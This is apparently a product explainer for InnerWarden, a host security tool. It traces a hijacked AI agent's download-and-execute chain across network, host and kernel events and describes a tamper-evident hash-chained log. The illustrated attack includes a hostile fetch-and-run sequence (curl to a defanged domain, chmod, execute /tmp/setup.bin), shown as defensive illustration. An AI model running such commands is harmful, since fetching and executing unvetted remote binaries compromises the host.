Scattered events look innocent. Connected, they are an attack.
How InnerWarden connects the dots a hijacked AI agent leaves across network, host and kernel, and why the record can be trusted.
Trust nothing.
Verify everything.

first seen 02:31:16 UTC
first contact with this host
203.0.113.7
first seen 02:31:16 UTC
ttl 300s
screen: review. not denied
time 02:31:17 UTC

path /tmp/setup.bin
owner dev · perms 0755
time 02:31:18 UTC

Ubuntu 22.04 LTS
InnerWarden agent on
- domain resolves
- script downloaded
- file written
- process spawned
└─ bash (4301)
├─ curl (4312)
└─ sh (4313)
└─ setup.bin ← blocked
setup.bin · 132 KB
curl -o /tmp/setup.bin pkgs.sh/x
chmod +x /tmp/setup.bin
/tmp/setup.bin

reason unapproved program
time 02:31:19 UTC · -EPERM
anchor Ed25519 (Pro & Enterprise)
records: 4192
#4190 c07d… prev 9f2c…
#4191 5bde… prev c07d…
latest 7e91… ✓
Each line of the log carries the SHA-256 of the line before it, and the file is locked so two writers cannot fork the chain. Edit one line and every hash after it stops matching; the break points at the exact spot. The chain proves the log is internally consistent; the off-host Ed25519 anchor(Pro & Enterprise) proves it is the original. Owning the host is not enough to rewrite what happened.
The knowledge graph (11 node types, about 60 typed relations) and the correlation engine (staged rules across 6 layers with 69 cross-layer rules, plus a kill-chain tracker watching 8 named attack shapes) ship in Pro & Enterprise. The reactive screen's review flag does not block an exec by itself; the deny came from the kernel Execution Gate (hash allowlist, -EPERM, supported Linux, armed, Pro & Enterprise). The audit log is a SHA-256 hash chain, file-locked; the off-host Ed25519 anchor is Pro & Enterprise. The IP shown (203.0.113.7) is a documentation-reserved address and the domain is shown defanged; no attack-technique IDs are claimed. Facts verified against messaging/how-it-decides.md and reports/numbers.md.